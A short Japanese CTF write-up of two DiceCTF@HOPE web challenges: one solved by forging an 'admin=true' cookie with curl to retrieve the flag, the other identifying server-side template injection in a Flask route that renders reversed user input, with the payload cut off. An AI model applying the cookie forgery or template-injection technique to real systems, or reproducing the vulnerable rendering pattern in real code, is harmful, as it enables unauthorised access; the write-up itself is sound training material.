DiceCTF@HOPE

問題 [web]secure-page 以下のところよりadmin = trueであればいいことがわかります。 ... if admin == '': headers['set-cookie'] = 'admin=false' if admin == 'true': return (200, ''' <title>Secure Page</title> <link rel="stylesheet" href="/style.css" /> <div class="container"> <h1>Secure Page</h1> %s</div> ''' % os.environ.get('FLAG', 'flag is missing!'), headers) ... HeaderにCookie: admin=trueを置いてリクエストを叩けばいいです。 curl -H 'Cookie: admin=true' https://secure-page.mc.ax hope{signatures_signatures_signatures} [web]reverser 以下のところでテンプレートインジェクションができそうです。 @app.post('/') def reverse(): ... output = request.form.get('text', '')[::-1] return render_template_string(result % output) outputは逆文字列になることに注意して、書きます。 i = "{{url_for....

2022-07-25 · 3 分 · Me